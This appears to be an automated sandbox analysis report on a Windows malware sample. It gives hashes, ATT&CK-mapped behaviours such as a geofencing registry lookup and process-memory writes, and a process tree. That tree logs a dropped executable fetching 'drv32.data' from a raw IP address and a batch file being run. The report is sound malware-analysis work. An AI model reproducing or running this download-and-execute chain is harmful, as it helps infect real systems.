8d437724ac136ad89b3dfa89cefe077e9016cec59e4c6475a93bee3a419ff8f8

Analysis

max time kernel
139s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2024, 14:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
Size

99KB
MD5

0e5c05933631c0c1f9c54bb1c48e5686
SHA1

074b9aa3537864c3481ed9ea6029653c64472df6
SHA256

8d437724ac136ad89b3dfa89cefe077e9016cec59e4c6475a93bee3a419ff8f8
SHA512

94e91ae8eabe55616bebd2647004af8c041edb50c405a05a7c28900f93bb80dbd057961da1fb17b05f6330515888d8c55ea1885743b58f938942dca8146eac8d
SSDEEP

1536:EJlwldZwdjTEo9cfWxfxHm9tYLiNqEWINp3+erhRhggt7FZ4BUbqdj:EJlwmjTsfWpRktYLiNqEWarNggBFGNx

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
1808	G41CD-tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 1808	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	83
PID 2520 wrote to memory of 1808	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	83
PID 2520 wrote to memory of 1808	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	83
PID 2520 wrote to memory of 4044	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	94
PID 2520 wrote to memory of 4044	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	94
PID 2520 wrote to memory of 4044	2520	0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe	94

C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Users\Admin\AppData\Local\Temp\G41CD-tmp.exe
  C:\Users\Admin\AppData\Local\Temp\G41CD-tmp.exe http://202.83.212.246/drv32.data "C:\Users\Admin\AppData\Local\Temp\G41CE-tmp"
  2⤵
  - Executes dropped EXE
  PID:1808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\tmp.bat" "
  2⤵
  PID:4044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\G41CD-tmp

Filesize
126KB

MD5
6deab4d5857cab2db48fee1d928159a3

SHA1
7b2d3295df966047325d19d4ecb49cc146a523dc

SHA256
a15c5f871a8c2fea715d646f397e142fbb20df4484a3c34f81e8ce8f458cd5cc

SHA512
b021dcc580fcbb5065dfaa76de31d59ff978694901d1a0e9ae678e9950793d22211de9175d032544eb6dafc42a3f9791058aa72c32edf033a92d65d6990fcf04

Download Submit
C:\tmp.bat

Filesize
51B

MD5
e39260fbd0f09023915be74113dac8aa

SHA1
3cac94fa073a279efe96471f35ce4464992f0bf8

SHA256
0dde2422540aedf928b56400e1eaa2d1efcdc595b486fcdd8a7d80105831f2c7

SHA512
234ad31da7c1b24caaa6050f29fac3d2bcbebea44261317b9c081f712232827156bd86a26af5b852875f4e12696154b9fa2719ce69bee5fa8f79d058068c3662

Download Submit
memory/1808-13-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1808-16-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/2520-0-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/2520-12-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/2520-22-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download